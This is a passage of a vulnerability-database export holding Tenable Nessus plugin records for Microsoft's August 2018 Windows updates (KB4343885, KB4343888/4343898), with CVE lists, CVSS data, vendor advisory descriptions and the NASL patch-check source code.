The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343885: Windows 10 Version 1703 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_AUG_4343885.NASL", "href": "https://www.tenable.com/plugins/nessus/111684", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111684);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-0952\",\n \"CVE-2018-8200\",\n \"CVE-2018-8204\",\n \"CVE-2018-8266\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8347\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8350\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8357\",\n \"CVE-2018-8360\",\n \"CVE-2018-8370\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8381\",\n \"CVE-2018-8385\",\n \"CVE-2018-8388\",\n \"CVE-2018-8389\",\n \"CVE-2018-8390\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8399\",\n \"CVE-2018-8401\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\",\n \"CVE-2018-8406\",\n \"CVE-2018-8414\"\n );\n script_bugtraq_id(\n 104977,\n 104978,\n 104980,\n 104982,\n 104983,\n 104984,\n 104985,\n 104986,\n 104987,\n 104988,\n 104992,\n 104995,\n 104998,\n 104999,\n 105001,\n 105006,\n 105007,\n 105008,\n 105011,\n 105012,\n 105016,\n 105027,\n 105030,\n 105041,\n 105048\n );\n script_xref(name:\"MSKB\", value:\"4343885\");\n script_xref(name:\"MSFT\", value:\"MS18-4343885\");\n\n script_name(english:\"KB4343885: Windows 10 Version 1703 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343885.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability 
exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. 
If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. 
(CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. 
The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. 
The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)\");\n # https://support.microsoft.com/en-us/help/4343885/windows-10-update-kb4343885\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2be0b30b\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343885 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343885');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343885])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:57", "description": "The remote Windows host is missing security update 4343888\nor cumulative update 4343898. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. 
An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8405)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. 
(CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A security feature bypass vulnerability exists when\n Active Directory Federation Services (AD FS) improperly\n handles multi-factor authentication requests.\n (CVE-2018-8340)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. 
An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)", "edition": 35, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343888: Windows 8.1 and Windows Server 2012 R2 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_AUG_4343898.NASL", "href": "https://www.tenable.com/plugins/nessus/111688", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111688);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/12/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8340\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8360\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\"\n );\n script_bugtraq_id(\n 104978,\n 104982,\n 104983,\n 104984,\n 104986,\n 104987,\n 104992,\n 104995,\n 104999,\n 105001,\n 105011,\n 105027,\n 105029,\n 105030\n );\n script_xref(name:\"MSKB\", value:\"4343898\");\n script_xref(name:\"MSKB\", value:\"4343888\");\n script_xref(name:\"MSFT\", value:\"MS18-4343898\");\n script_xref(name:\"MSFT\", value:\"MS18-4343888\");\n\n script_name(english:\"KB4343888: Windows 8.1 and Windows Server 2012 R2 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343888\nor cumulative update 4343898. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8405)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. 
An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A security feature bypass vulnerability exists when\n Active Directory Federation Services (AD FS) improperly\n handles multi-factor authentication requests.\n (CVE-2018-8340)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. 
For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\");\n # https://support.microsoft.com/en-us/help/4343898/windows-81-update-kb4343898\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?82e63681\");\n # https://support.microsoft.com/en-us/help/4343888/windows-81-update-kb4343888\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1fda3003\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4343888 or Cumulative Update KB4343898\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343898', '4343888');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, 